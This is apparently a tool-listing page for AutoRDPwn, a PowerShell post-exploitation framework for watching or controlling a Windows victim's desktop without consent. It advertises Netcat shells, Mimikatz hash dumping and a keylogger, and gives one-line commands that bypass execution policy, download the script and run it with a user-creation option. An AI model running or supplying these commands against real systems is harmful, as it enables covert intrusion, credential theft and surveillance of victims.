AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim’s desktop without his consent, and even control it on demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.
Powershell 4.0 or higher
*The rest of the changes can be consulted in the CHANGELOG file
Also Read – Pyshark : Python Wrapper For TShark, Allowing Python Packet Parsing Using Wireshark Dissectors
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:
Local execution on one line:
powershell -ep bypass “cd $ env: temp; iwr -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1”
Example of remote execution on a line:
powershell -ep bypass “cd $ env: temp; iwr -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser”
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